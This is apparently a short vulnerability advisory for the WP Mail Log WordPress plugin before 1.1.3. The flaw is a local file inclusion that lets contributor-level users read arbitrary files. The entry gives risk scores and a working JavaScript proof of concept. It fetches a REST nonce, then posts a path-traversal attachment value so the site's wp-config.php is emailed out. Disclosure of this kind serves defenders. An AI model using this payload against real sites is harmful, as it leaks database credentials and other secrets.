WP Mail Log < 1.1.3 – Contributor+ LFI in wml_logs/send_mail endpoint

2023-11-2800:00:00

dc11

wp mail log

lfi

code execution

AI Score

6.6

Confidence

High

EPSS

0.001

Percentile

18.3%

JSON

Description The plugin does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files.

Run the following within any page on the site, ensuring that the `id` parameter is set to a valid ID for a log entry. Inspect the email that is sent, and see that it contains the site's `wp-config.php` file as an attachment.

var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();

await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=1&[email protected]&includeAttachment={"../../wp-config.php":1}'})).text();